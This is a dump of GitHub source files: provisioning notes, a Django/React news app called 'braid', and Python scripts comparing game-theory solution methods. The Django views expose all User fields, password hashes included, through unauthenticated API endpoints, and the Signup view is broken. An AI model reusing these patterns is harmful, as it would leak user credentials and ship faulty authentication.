"license_type": "no_license",
"max_line_length": 56,
"num_lines": 29,
"path": "/deploy_tools/provisioning_notes.md",
"repo_name": "Faramita2/superlists",
"src_encoding": "UTF-8",
"text": "配置新网站\n================\n## 需要的包: \n* nginx\n* Python 3.7\n* virtualenv + pip\n* Git\n\n以Ubuntu 19.04为例: \n sudo apt-get install nginx git python37 python3.7-venv\n\n## Nginx虚拟主机\n* 参考nginx.teamplate.conf\n* 把SITENAME替换成所需的域名, 例如lgzzzz.com\n\n## Systemd服务\n* 参考gunicorn-upstart.template.conf\n* 把SITENAME替换成所需的域名, 例如lgzzzz.com\n\n## 文件夹结构\n假设有用户账户, 家目录为/home/username\n\n/home/username\n└── sites\n └── SITENAME \n ├── database\n ├── source\n ├── static\n └── virtualenv\n\n"
}
] | 3 |
seemamir/braid
|
https://github.com/seemamir/braid
|
b1d15a88ddadd3faff39df375c26d27252078309
|
d47d662bf2bb8d96585edcf981d881411aa20443
|
71ab91f34fbfb0adb5db6e1a8fb2cbf1e77ff439
|
refs/heads/master
| 2020-04-08T02:44:32.333963 | 2018-11-28T21:51:55 | 2018-11-28T21:51:55 | 158,947,063 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6790017485618591,
"alphanum_fraction": 0.6798623204231262,
"avg_line_length": 28.794872283935547,
"blob_id": "e0aa5f5958e5524983d0a8c681188e4a416ad1de",
"content_id": "37fecb9ea7575c74a45cdafad5f31d830eb2a288",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1162,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 39,
"path": "/app/containers/NewsPage/saga.js",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "import { takeLatest, call, put, cancel, take } from 'redux-saga/effects';\nimport { get } from 'lodash';\nimport * as api from './api';\nimport * as a from './actions';\nimport * as c from './constants';\nexport function* index(action) {\n try {\n const { id } = action;\n const response = yield call(api.fectSavedPosts, id);\n yield put(a.setPosts(response.data));\n } catch (error) {}\n}\n\nexport function* updateProfile(action) {\n try {\n const res = yield call(api.updateProfile, action.payload);\n console.log(res);\n } catch (e) {\n console.log(e.message);\n }\n}\n// Individual exports for testing\nexport function* fetchProfile(action) {\n try {\n console.log(action);\n const response = yield call(api.fetchProfile, action.payload);\n console.log(response.data);\n yield put(a.setProfile(get(response, 'data[0]', {})));\n } catch (e) {\n console.log(e.message);\n }\n}\n// Individual exports for testing\nexport default function* newsPageSaga() {\n // See example in containers/HomePage/saga.js\n yield takeLatest(c.FETCH_POSTS, index);\n yield takeLatest(c.UPDATE_PROFILE, updateProfile);\n yield takeLatest(c.FETCH_PROFILE, fetchProfile);\n}\n"
},
{
"alpha_fraction": 0.6796116232872009,
"alphanum_fraction": 0.6796116232872009,
"avg_line_length": 50.5,
"blob_id": "57f4f302ca08fb1501a73155fa9dc726feec3ce5",
"content_id": "2847cd351a816101132b3fa7f17e125b1c9d1a6e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 618,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 12,
"path": "/app/containers/ViewNews/api.js",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "import axios from '../../utils/http';\n\nexport const viewPostApi = id => axios.get(`/api/post/${id}/`);\nexport const updatePostApi = (id, payload) => {\n console.log(id, payload);\n return axios.post(`/api/post/${id}/`, payload);\n};\nexport const comment = data => axios.post(`/api/comment/`, data);\nexport const commentsApi = id => axios.get(`/api/comment/?post=${id}`);\nexport const setPostReaction = data => axios.post(`/api/post-reaction/`, data);\nexport const getPostReactions = postID => axios.get(`/api/post-reaction/?post=${postID}`);\nexport const saveAsSavedPost = data => axios.post(`/api/saved-post/`, data);\n"
},
{
"alpha_fraction": 0.7039999961853027,
"alphanum_fraction": 0.7039999961853027,
"avg_line_length": 30.25,
"blob_id": "974bdde29537af4e3e76cfad459f967a34232738",
"content_id": "2a67ae0a5426327f43f3cb1e4aced741f9cfb7c8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 125,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 4,
"path": "/app/containers/Signup/api.js",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "import axios from '../../utils/http';\n\nexport const createAccountApi = payload =>\n axios.post('rest-auth/signup', payload);\n"
},
{
"alpha_fraction": 0.7242140173912048,
"alphanum_fraction": 0.7357970476150513,
"avg_line_length": 30.807018280029297,
"blob_id": "d4f8aff504589bb3c154ac686ce8dab79f06b0fc",
"content_id": "f8e86fcd32ee535ec75121110128a8f528ff2f41",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1813,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 57,
"path": "/jango/api/models.py",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass Post(models.Model):\n title = models.CharField(max_length=250)\n user = models.ForeignKey(User,on_delete=models.CASCADE)\n author = models.CharField(max_length=250)\n category = models.CharField(max_length=250)\n source = models.CharField(max_length=250)\n author_description = models.TextField(blank=True)\n main_sentence = models.TextField(blank=True)\n sentence2 = models.TextField(blank=True)\n sentence3 = models.TextField(blank=True)\n sentence4 = models.TextField(blank=True)\n people1 = models.TextField(blank=True)\n people2 = models.TextField(blank=True)\n people3 = models.TextField(blank=True)\n people4 = models.TextField(blank=True)\n \n embedded_image = models.TextField(blank=True)\n thumbnail_image = models.TextField(blank=True)\n\n def __str__(self):\n return self.title\n\n\nclass Profile(models.Model):\n user = models.ForeignKey(User,on_delete=models.CASCADE,unique=True)\n bio = models.TextField(blank=True)\n image = models.TextField(blank=True)\n \n def __str__(self):\n return \"Post reaction\"\n\nclass PostReaction(models.Model):\n post = models.ForeignKey('api.Post',on_delete=models.CASCADE)\n reaction_type = models.CharField(max_length=20)\n user = models.ForeignKey(User,on_delete=models.CASCADE)\n\n def __str__(self):\n return \"Post reaction\"\n\nclass SavedPost(models.Model):\n post = models.ForeignKey('api.Post',on_delete=models.CASCADE)\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n\n def __str__(self):\n return \"Saved post\"\n\nclass Comment(models.Model):\n post = models.ForeignKey('api.Post',on_delete=models.CASCADE)\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n comment = models.TextField()\n\n def __str__(self):\n return \"Saved post\"\n"
},
{
"alpha_fraction": 0.8354430198669434,
"alphanum_fraction": 0.8354430198669434,
"avg_line_length": 33,
"blob_id": "c5c2d8742b68006090b043db9aeeccad62471d01",
"content_id": "d39aa223b86014c10b97266533472dd28fc3128b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 237,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 7,
"path": "/jango/api/admin.py",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import Post,PostReaction,SavedPost,Profile\n# Register your models here.\nadmin.site.register(Post)\nadmin.site.register(PostReaction)\nadmin.site.register(SavedPost)\nadmin.site.register(Profile)"
},
{
"alpha_fraction": 0.681034505367279,
"alphanum_fraction": 0.681034505367279,
"avg_line_length": 37.66666793823242,
"blob_id": "0eed6edb4897ee03ed8b8f56d9aafe7598fa046a",
"content_id": "c22b8c101b5a2f657d48e424585c905064dfba32",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 116,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 3,
"path": "/app/containers/Login/api.js",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "import axios from '../../utils/http';\n\nexport const loginApi = payload => axios.post('/rest-auth/login/', payload);\n"
},
{
"alpha_fraction": 0.7064220309257507,
"alphanum_fraction": 0.7064220309257507,
"avg_line_length": 14.571428298950195,
"blob_id": "4cf5185e6971d0278bfbe23fad8dfc88aa68598c",
"content_id": "5a4068288a44644cea6eda04a143cc1d3d0f4b9b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 109,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 7,
"path": "/app/containers/ForgetPassword/constants.js",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "/*\n *\n * ForgetPassword constants\n *\n */\n\nexport const DEFAULT_ACTION = 'app/ForgetPassword/DEFAULT_ACTION';\n"
},
{
"alpha_fraction": 0.7085427045822144,
"alphanum_fraction": 0.7085427045822144,
"avg_line_length": 21.11111068725586,
"blob_id": "83bc24d046c416654955dae4ccc5df000a1700a6",
"content_id": "7951532e0378f5ac7b044f0350d6dfa2a5dbf916",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 199,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 9,
"path": "/app/containers/AddNews/constants.js",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "/*\n *\n * AddNews constants\n *\n */\n\nexport const DEFAULT_ACTION = 'app/AddNews/DEFAULT_ACTION';\nexport const ADD_POST = 'app/AddNews/ADD_POST';\nexport const SET_RESPONSE = 'app/AddNews/SET_RESPONSE';\n"
},
{
"alpha_fraction": 0.8050000071525574,
"alphanum_fraction": 0.8050000071525574,
"avg_line_length": 37.095237731933594,
"blob_id": "8d31e87805c260a4e418c22ae2ec397f5c2657ee",
"content_id": "adae0f1ddad5ae1bbfe8ea560f20ced199c2509e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 800,
"license_type": "permissive",
"max_line_length": 171,
"num_lines": 21,
"path": "/jango/api/urls.py",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url, include\nfrom django.urls import path\nfrom rest_framework import routers\nfrom .views import PostViewSet, PostReactionViewSet, SavedPostViewSet, Login, Signup, RequestPasswordResetToken, ResetPassword, UserViewSet, CommentViewSet, ProfileViewSet\nfrom django.conf.urls import url\n \nrouter = routers.DefaultRouter()\nrouter.register(r'post', PostViewSet)\nrouter.register(r'post-reaction', PostReactionViewSet)\nrouter.register(r'saved-post', SavedPostViewSet)\nrouter.register(r'user', UserViewSet)\nrouter.register(r'comment', CommentViewSet)\nrouter.register(r'user-profile', ProfileViewSet)\n\nurlpatterns = [\n url(r'', include(router.urls)),\n path('signup',Signup),\n path('resetPassword',ResetPassword),\n path('requestPasswordResetToken',RequestPasswordResetToken),\n\n]\n"
},
{
"alpha_fraction": 0.6731283664703369,
"alphanum_fraction": 0.6731283664703369,
"avg_line_length": 23.933332443237305,
"blob_id": "9e85e60614b8c90b152e467bcb39f1dda109ee14",
"content_id": "90febe617f6613728f1e7780fbc40a3a1274bd3f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1496,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 60,
"path": "/jango/api/serializers.py",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "from .models import Post,PostReaction,SavedPost, Comment, Profile\nfrom rest_framework import routers, serializers, viewsets\nfrom django.contrib.auth.models import User\n\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = \"__all__\"\n\nclass PostSerializer(serializers.ModelSerializer):\n class Meta:\n model = Post\n fields = \"__all__\"\n\nclass ProfileSerializer(serializers.ModelSerializer):\n class Meta:\n model = Profile\n fields = \"__all__\"\n\nclass PostReactionSerializer(serializers.ModelSerializer):\n # user = UserSerializer(many=False, read_only=False)\n class Meta:\n model = PostReaction\n fields = \"__all__\"\n\n\nclass SavedPostSerializer(serializers.ModelSerializer):\n # post = PostSerializer(many=False, read_only=False)\n \n class Meta:\n model = SavedPost\n fields = \"__all__\"\n\nclass CommentSerializer(serializers.ModelSerializer):\n # user = UserSerializer(many=False, read_only=False)\n class Meta:\n model = Comment\n fields = \"__all__\"\n\n\n # def create(self, validated_data):\n # user = User.objects.create(\n # username=validated_data['username'],\n # first_name=validated_data['first_name'],\n # last_name=validated_data['last_name'],\n # email=validated_data['email'],\n # )\n\n\n # user.set_password(validated_data['password'])\n # user.save()\n # profile = Profile.objects.create(\n # user=user,\n # bio='bio',\n # image='not_set'\n # )\n # profile.save()\n\n # return user\n"
},
{
"alpha_fraction": 0.7336342930793762,
"alphanum_fraction": 0.7343867421150208,
"avg_line_length": 30.64285659790039,
"blob_id": "4f96c5d9e48e20059bc61c7230a5671287560b12",
"content_id": "c1ca59caf3597eff787ba9bf8179fa1f1f89c7ce",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2658,
"license_type": "permissive",
"max_line_length": 136,
"num_lines": 84,
"path": "/jango/api/views.py",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom .models import Post,PostReaction,SavedPost, Comment,Profile\nfrom .serializers import PostSerializer,PostReactionSerializer, SavedPostSerializer, UserSerializer,CommentSerializer, ProfileSerializer\n\nfrom django.contrib.auth.models import User\nfrom rest_framework import status, viewsets\nfrom django.http import JsonResponse\n# import django_filters.rest_framework\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom django.contrib.auth.models import User\n# Create your views here.\n\n\nclass PostViewSet(viewsets.ModelViewSet):\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n filter_backends = (DjangoFilterBackend,)\n filter_fields = ('id','title','category')\n\n\nclass ProfileViewSet(viewsets.ModelViewSet):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n filter_backends = (DjangoFilterBackend,)\n filter_fields = ('id','user')\n\nclass CommentViewSet(viewsets.ModelViewSet):\n queryset = Comment.objects.all()\n serializer_class = CommentSerializer\n filter_backends = (DjangoFilterBackend,)\n filter_fields = ('id','user','post')\n\nclass PostReactionViewSet(viewsets.ModelViewSet):\n queryset = PostReaction.objects.all()\n serializer_class = PostReactionSerializer\n filter_backends = (DjangoFilterBackend,)\n filter_fields = ('post','user','reaction_type')\n\nclass SavedPostViewSet(viewsets.ModelViewSet):\n queryset = SavedPost.objects.all()\n serializer_class = SavedPostSerializer\n filter_backends = (DjangoFilterBackend,)\n filter_fields = ('id', 'user')\n\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n filter_backends = (DjangoFilterBackend,)\n filter_fields = ('id','username','first_name','last_name','email')\n \ndef Login(request):\n method = request.method\n if (method == 'POST'):\n return JsonResponse({'success': \"\"})\n else:\n return JsonResponse({'error': \"This request only handles post request\"})\n\n\ndef Signup(request):\n method = request.method\n if (method == 'POST'):\n # try:\n user = User.objects.create(\n username=request.POST['username'],\n first_name=request.POST['first_name'],\n last_name=request.POST['last_name'],\n email=request.POST['email'],\n )\n\n user.set_password(user['password'])\n user.save()\n return JsonResponse({'password': user['email']})\n # except:\n # return JsonResponse({'error': 'Something went wrong'})\n else:\n return JsonResponse({'error': \"This request only handles post request\"})\n\n\ndef RequestPasswordResetToken(request):\n return 3\n\n\ndef ResetPassword(request):\n return 4\n"
},
{
"alpha_fraction": 0.4632086753845215,
"alphanum_fraction": 0.508142352104187,
"avg_line_length": 16.4526309967041,
"blob_id": "16696f210d68b5868d5e7b0963ae7c5333fef852",
"content_id": "6c41cb16c74bd2d988567430a5d842715ba89427",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3316,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 190,
"path": "/app/global-styles.js",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "import { createGlobalStyle } from 'styled-components';\n\nconst GlobalStyle = createGlobalStyle`\n html,\n body {\n height: 100%;\n width: 100%;\n background-color: #fafafa;\n }\n\n body {\n font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;\n }\n\n body.fontLoaded {\n font-family: 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif;\n }\n\n #app {\n background-color: #fafafa;\n min-height: 100vh;\n min-width: 100%;\n }\n .container{\n width:85%;\n margin: 30px auto;\n }\n .bg-white{\n background: white;\n padding:20px;\n }\n .danger-btn{\n background:red;\n color:white;\n margin-top:20px;\n border-color:red;\n }\n textarea{\n border: 1px solid #eee;\n width: 100%;\n padding: 8px\n }\n .danger-btn{\n background:red;\n color:white;\n margin-top:20px;\n }\n p { \n color: #999\n }\n .comments{\n text-align:left;\n p{\n color: #555;\n margin: 15px 0 !important;\n }\n }\n .logo{\n float:left;\n color:#555;\n font-weight:bold;\n padding-left:20px;\n }\n .ant-alert{\n margin-bottom: 30px;\n }\n .content{\n margin: 24px 16px;\n padding: 24px;\n background: #fff;\n }\n .btn-success{\n background:#4CAF50;\n border-color: #4CAF50;\n :hover,:focus{\n background:#449d48;\n border-color: #449d48;\n \n }\n }\n /* Header */\n .sidebar .logo {\n text-align:center;\n img{\n width:50%;\n margin-bottom:30px;\n }\n }\n /* Login Page */\n .wrapper{\n text-align:center;\n padding-top:100px;\n .logo{\n margin:30px auto;\n font-size:50px;\n }\n h3{\n font-size:20px;\n }\n .login-form {\n max-width: 100%;\n margin-top:30px;\n input{\n background:transparent;\n :hover, :focus{\n border:1px solid #ccc7c7 !important;\n box-shadow:none;\n }\n }\n .login-form-forgot {\n text-align: right;\n margin-top:10px;\n }\n .go-back {\n text-align: left;\n margin-top:10px;\n }\n .login-form-button {\n width: 100%;\n .anticon svg{\n margin-top:-8px;\n margin-left:10px;\n color:white;\n }\n }\n .signup-btn{\n margin-top:25px;\n }\n .signup{\n margin-top:30px;\n }\n .content-divider {\n text-align: center;\n display:block;\n position: relative;\n z-index: 1;\n span {\n background-color: #eeeded;\n display: inline-block;\n padding: 1px 16px;\n line-height:18px;\n color: #999999;\n :before{\n content: \"\";\n position: absolute;\n top: 50%;\n left: 0;\n height: 1px;\n background-color: #ddd;\n width: 100%;\n z-index: -1;\n }\n }\n } \n }\n }\n /* News page */\n\n .avatar-uploader {\n .ant-upload{\n border-radius:50%;\n margin:auto auto 10px auto;\n i{\n font-size:25px;\n }\n }\n .ant-upload {\n width: 128px;\n height: 128px;\n }\n img{\n width: 128px;\n height: 128px;\n border-radius:50%;\n }\n }\n .news-box{\n margin-bottom: 50px ;\n\n }\n footer{\n background: #fff;\n color: #8c8c8c;\n text-align: center;\n padding: 20px 0;\n }\n \n`;\n\nexport default GlobalStyle;\n"
},
{
"alpha_fraction": 0.7586206793785095,
"alphanum_fraction": 0.7758620977401733,
"avg_line_length": 28,
"blob_id": "7f00ca4d30c293dc19a1637da6fe78dc7a431a3a",
"content_id": "7a1cd1f834402f519843b28925fb6afac6cf624c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 348,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 12,
"path": "/README.md",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "BACKEND COMMANDS\n\nFiltering: `pip install django-filter==2.0` must install\nStart server: `manage.py runserver`\nMigrate: `manage.py migrate`\nStart Migrations: `manage.py makemigrations`\nIn case of database re migrate: `manage.py migrate --run-syncdb`\n\nFRONTEND\nInstall dependencies: `npm install`\nRun server: `npm run`\nopen on port `localhost:3000`\n"
},
{
"alpha_fraction": 0.6158273220062256,
"alphanum_fraction": 0.6158273220062256,
"avg_line_length": 12.899999618530273,
"blob_id": "9be96b1303911ee475022c75d6b92acba98ac5b9",
"content_id": "f8a5fec8ec8c7ba71910474f0a425a53128888ab",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 695,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 50,
"path": "/app/containers/NewsPage/actions.js",
"repo_name": "seemamir/braid",
"src_encoding": "UTF-8",
"text": "/*\n *\n * NewsPage actions\n *\n */\n\nimport * as c from './constants';\n\nexport function defaultAction() {\n return {\n type: c.DEFAULT_ACTION,\n };\n}\nexport function fetchPosts(id) {\n return {\n type: c.FETCH_POSTS,\n id,\n };\n}\n\nexport function updateProfile(payload) {\n return {\n type: c.UPDATE_PROFILE,\n payload,\n };\n}\nexport function fetchProfile(payload) {\n return {\n type: c.FETCH_PROFILE,\n payload,\n };\n}\nexport function setProfile(payload) {\n return {\n type: c.SET_PROFILE,\n payload,\n };\n}\n\nexport function setPosts(payload) {\n return {\n type: c.SET_POSTS,\n payload,\n };\n}\nexport function unmountRedux() {\n return {\n type: c.UNMOUNT_REDUX,\n };\n}\n"
}
] | 14 |
chleulau/MMRAlgorithm
|
https://github.com/chleulau/MMRAlgorithm
|
77393c20b2a058cddd40e432e2fb469de5eafc3d
|
0c635f77a2de78b1790a017629ab3bbc891dbded
|
771bf2fdcd04e7dac6ad612690f74ffd90b47c7f
|
refs/heads/master
| 2020-06-19T22:15:13.262072 | 2019-07-14T23:49:44 | 2019-07-14T23:49:44 | 196,894,133 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5088598132133484,
"alphanum_fraction": 0.5562403798103333,
"avg_line_length": 29.904762268066406,
"blob_id": "7e5a13e07f78bb77a16f230612c487299d6a9f46",
"content_id": "76b9514cd15e49ab387def8ce65e9ba80111ed80",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2596,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 84,
"path": "/stester.py",
"repo_name": "chleulau/MMRAlgorithm",
"src_encoding": "UTF-8",
"text": "import gambit\nimport os\nfrom cvxopt import matrix, solvers\n\ndef cvxtest(arr, numv):\n\tc = matrix(([0.0] * numv) + [-1])\n\tk = [[-arr[0][cvxi], -arr[1][cvxi]] for cvxi in xrange(len(arr[0]))]\n\tfor cvxi in xrange(len(arr[0])):\n\t\tk[cvxi].extend([-int(cvxi == cvxj) for cvxj in xrange(numv)])\n\tk.append([1, 1] + ([0] * numv))\n\tG = matrix([[float(i) for i in k1] for k1 in k])\n\th = matrix(([0.0] * len(k[0])))\n\tA = matrix([[1.0] for cvxj in xrange(numv)] + [[0.0]])\n\tb = matrix([1.0])\n\tsol = solvers.lp(c, G, h, A, b)\n\treturn [float(xi) for xi in sol['x']][:-1]\n\ndef prob(a, numa, numb):\n\tp1 = [sum(a[i:i + numb]) for i in xrange(0, len(a), numb)]\n\tp2 = []\n\tfor i in xrange(numb):\n\t\ts, si = 0, i\n\t\twhile si < len(a):\n\t\t\ts = s + a[si]\n\t\t\tsi = si + numb\n\t\tp2.append(s)\n\treturn [i / sum(p1) for i in p1], [i / sum(p2) for i in p2]\n\ndef epayof(a, ki, kj):\n\tlki, lkj, e, e1 = len(ki), len(kj), 0, 0\n\tfor i in xrange(len(a[0])):\n\t\te = e + (a[0][i] * ki[i / lkj] * kj[i % lkj])\n\tfor i in xrange(len(a[1])):\n\t\te1 = e1 + (a[1][i] * ki[i / lkj] * kj[i % lkj]) \n\treturn e, e1\n\ndef comppay(a, sc1, sc2):\n\tk = cvxtest(a1, au * au)\n\tki, kj = prob(k, au, au)\n\tei1, ej1 = epayof(a1, ki, kj)\n\treturn ei1, ej1\n\n#Set variable actions and general game command s\nsgame = 'java -jar gamut.jar -output GambitOutput -normalize -min_payoff 0 -max_payoff 1 -g '\nactions = [30, 40, 60]\ng1 = open('output.txt', 'w')\nfor au in actions:\n\tly = []\n\t#Generate RandomGame (Games 001 - 100)\n\tfor i in xrange(1, 31):\n\t\t#Generate the game file to grab data from, grab the data, close the file\n\t\tt = ('0' * (3 - len(str(i)))) + str(i)\n\t\tos.system(sgame + 'RandomGame -players 2 -actions ' + str(au) + ' -f ' + t + '.nfg >/dev/null 2>&1')\n\t\tg = gambit.Game.read_game(t + '.nfg')\n\t\n\t\t#Put data into payoff matrices\n\t\tgamenum = i\n\t\ta1 = [[], []]\n\t\tfor profile in g.contingencies:\n\t\t\ta1[0].append(float(g[profile][0]))\n\t\t\ta1[1].append(float(g[profile][1]))\n\t\tr = list(gambit.nash.lcp_solve(g, use_strategic=True, rational=False, stop_after=1)[0])\n\t\tr = [r[:au], r[au:]]\n\t\tei, ej = epayof(a1, r[0], r[1])\n\t\tk = cvxtest(a1, au * au)\n\t\tki, kj = prob(k, au, au)\n\t\tei1, ej1 = epayof(a1, ki, kj)\n\t\tvi1 = int(ei1 >= ei)\n\t\tvi2 = int(ej1 >= ej)\n\t\tif (vi1 + vi2) >= 1:\n\t\t\tij = int(ei1 >= ej1)\n\t\t\tfor scal in xrange(100):\n\t\t\t\tvij = []\n\t\t\t\tvij[ij] = .5 - (scal / 200.0)\n\t\t\t\tvij[(ij + 1) % 2] = .5 + (scal / 200.0)\n\t\t\t\tvei, vej = comppay(a, vij[0], vij[1])\n\t\t\t\tif abs(vei - vej) < .00001:\n\t\t\t\t\tly.append('(' + str(vei) + ',' + str(vej) + ')' + '\\n')\n\t\t\t\t\tbreak\n\tg1.write('Action:' + str(au) + '\\n')\n\tfor lyi in ly:\n\t\tg1.write(lyi)\n\tg1.write('\\n')\ng1.close()\n"
},
{
"alpha_fraction": 0.5331905484199524,
"alphanum_fraction": 0.5735189318656921,
"avg_line_length": 34.025001525878906,
"blob_id": "cfea14582b75bed7f824391f1cebdfea31c564d6",
"content_id": "b23846c33a4828ddaa4ae57d4b7aa40cf303579f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2802,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 80,
"path": "/MMRComparison.py",
"repo_name": "chleulau/MMRAlgorithm",
"src_encoding": "UTF-8",
"text": "import gambit\nimport os\nfrom cvxopt import matrix, solvers\n\ndef cvxtest(arr, numv):\n\tc = matrix(([0.0] * numv) + [-1])\n\tk = [[-arr[0][cvxi], -arr[1][cvxi]] for cvxi in xrange(len(arr[0]))]\n\tfor cvxi in xrange(len(arr[0])):\n\t\tk[cvxi].extend([-int(cvxi == cvxj) for cvxj in xrange(numv)])\n\tk.append([1, 1] + ([0] * numv))\n\tG = matrix([[float(i) for i in k1] for k1 in k])\n\th = matrix(([0.0] * len(k[0])))\n\tA = matrix([[1.0] for cvxj in xrange(numv)] + [[0.0]])\n\tb = matrix([1.0])\n\tsol = solvers.lp(c, G, h, A, b)\n\treturn [float(xi) for xi in sol['x']][:-1]\n\ndef prob(a, numa, numb):\n\tp1 = [sum(a[i:i + numb]) for i in xrange(0, len(a), numb)]\n\tp2 = []\n\tfor i in xrange(numb):\n\t\ts, si = 0, i\n\t\twhile si < len(a):\n\t\t\ts = s + a[si]\n\t\t\tsi = si + numb\n\t\tp2.append(s)\n\treturn [i / sum(p1) for i in p1], [i / sum(p2) for i in p2]\n\ndef epayof(a, ki, kj):\n\tlki, lkj, e, e1 = len(ki), len(kj), 0, 0\n\tfor i in xrange(len(a[0])):\n\t\te = e + (a[0][i] * ki[i / lkj] * kj[i % lkj])\n\tfor i in xrange(len(a[1])):\n\t\te1 = e1 + (a[1][i] * ki[i / lkj] * kj[i % lkj]) \n\treturn e, e1\n\n#Set variable actions and general game command s\nsgame = 'java -jar gamut.jar -output GambitOutput -normalize -min_payoff 1 -max_payoff 1000 -g '\nactions = [2, 10, 20, 30, 40, 60]\ng1 = open('output.txt', 'w')\nfor au in actions:\n\tasw, bet, tg, werr, berr = 0, 0, 0, [], []\n\t#Generate RandomGame (Games 001 - 100)\n\tfor i in xrange(1, 31):\n\t\t#Generate the game file to grab data from, grab the data, close the file\n\t\tt = ('0' * (3 - len(str(i)))) + str(i)\n\t\tos.system(sgame + 'RandomGame -players 2 -actions ' + str(au) + ' -f ' + t + '.nfg >/dev/null 2>&1')\n\t\tg = gambit.Game.read_game(t + '.nfg')\n\t\n\t\t#Put data into payoff matrices\n\t\tgamenum = i\n\t\ta1 = [[], []]\n\t\tfor profile in g.contingencies:\n\t\t\ta1[0].append(float(g[profile][0]))\n\t\t\ta1[1].append(float(g[profile][1]))\n\t\tr = list(gambit.nash.lcp_solve(g, use_strategic=True, rational=False)[0])\n\t\tr = [r[:au], r[au:]]\n\t\tei, ej = epayof(a1, r[0], r[1])\n\t\tk = cvxtest(a1, au * au)\n\t\tki, kj = prob(k, au, au)\n\t\tei1, ej1 = epayof(a1, ki, kj)\n\t\tvi1 = int(ei1 >= ei)\n\t\tif ei1 >= ei:\n\t\t\tberr.append(abs((ei1 - ei) / ei))\n\t\telse:\n\t\t\twerr.append(abs((ei1 - ei) / ei))\n\t\tvi2 = int(ej1 >= ej)\n\t\tif ej1 >= ej:\n\t\t\tberr.append(abs((ej1 - ej) / ej))\n\t\telse:\n\t\t\twerr.append(abs((ej1 - ej) / ej))\t\n\t\tasw = asw + int((vi1 + vi2) >= 1)\n\t\tbet = bet + int((vi1 + vi2) == 2)\n\tg1.write('Action:' + str(au) + '\\n')\n\tg1.write('Num of games where MM do as well or better than LH:' + str(asw) + '\\n')\n\tg1.write('Num of games where MM do strictly better than LH:' + str(bet) + '\\n')\n\tg1.write('Mean relative error when MM does better than LH:' + str(sum(berr) / float(len(berr))) + '\\n')\n\tg1.write('Mean relative error when MM does worse than LH:' + str(sum(werr) / float(len(werr))) + '\\n')\n\tg1.write('\\n')\ng1.close()\n"
}
] | 2 |
austinv11/ByteDiagrams
|
https://github.com/austinv11/ByteDiagrams
|
26a70fbb271b00ffcc8355bc7349a219fe0b4550
|
3e0e70ab353ef069ea48c6bae3ec48d76aa6586d
|
dbe7718c85e23879c8811e9539ef3bf5986e1d54
|
refs/heads/master
